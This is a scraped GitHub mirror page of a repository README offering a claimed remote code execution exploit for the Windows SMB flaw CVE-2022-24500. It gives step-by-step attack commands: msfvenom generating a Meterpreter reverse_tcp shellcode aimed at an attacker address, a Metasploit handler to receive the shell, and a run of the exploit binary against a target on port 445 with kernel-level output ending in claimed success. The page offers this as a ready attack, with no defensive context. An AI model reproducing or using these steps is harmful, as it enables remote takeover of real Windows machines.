Light

jeffrywu28 / cve-2022-24500 Goto Github PK

View Code? Open in Web Editor NEW

This project forked from symsal/cve-2022-24500

0.0 0.0 0.0 1017 KB

CVE-2022-24500 RCE Exploit SMB Remote Code Execution Vulnerability

cve-2022-24500's Introduction

CVE-2022-24500 RCE Exploit

Windows SMB Remote Code Execution Vulnerability

Vulnerability: Windows 7 - Windows 2022 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500

step 1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.10.22.105 LPORT=4444 -f raw > shellcode.bin

step 2

msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.10.22.105
LHOST => 192.10.22.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

Exploit

CVE-2022-24500 ip port

C:\>CVE-2022-24500.exe 192.10.22.107 445
CVE-2022-24500 SMB Remote Exploit
[+] Checking... 192.10.22.107 445
[+] 192.10.22.107 445 IsOpen
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Try to execute shellcode!
[+] Exploit Suceess!

cve-2022-24500's People

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.

Jobs